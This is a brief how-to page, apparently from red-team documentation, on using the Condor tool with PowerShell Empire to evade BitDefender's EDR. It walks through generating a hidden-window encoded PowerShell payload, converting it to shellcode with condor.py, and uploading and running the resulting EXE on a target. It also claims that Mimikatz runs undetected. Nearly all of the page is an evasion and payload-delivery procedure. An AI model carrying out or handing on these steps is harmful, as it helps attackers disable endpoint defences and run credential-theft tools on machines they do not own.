BitDefender
Using Condor + Powershell Empire
The condor tool is also able to bypass BitDefender's EDR, including running Powershell Empire's own tools without any interruption, such as Mimikatz.
Open your Powershell Empire and generate a Powershell payload, example:
powershell -Sta -Nop -Window Hidden -EncodedCommand cwB2ACAAbwAgACg...
Run the condor tool with the following command:
python3 condor.py -p windows/x64/exec
Paste the Powershell payload to generate the shellcode

Upload the EXE to the machine and run.

Last updated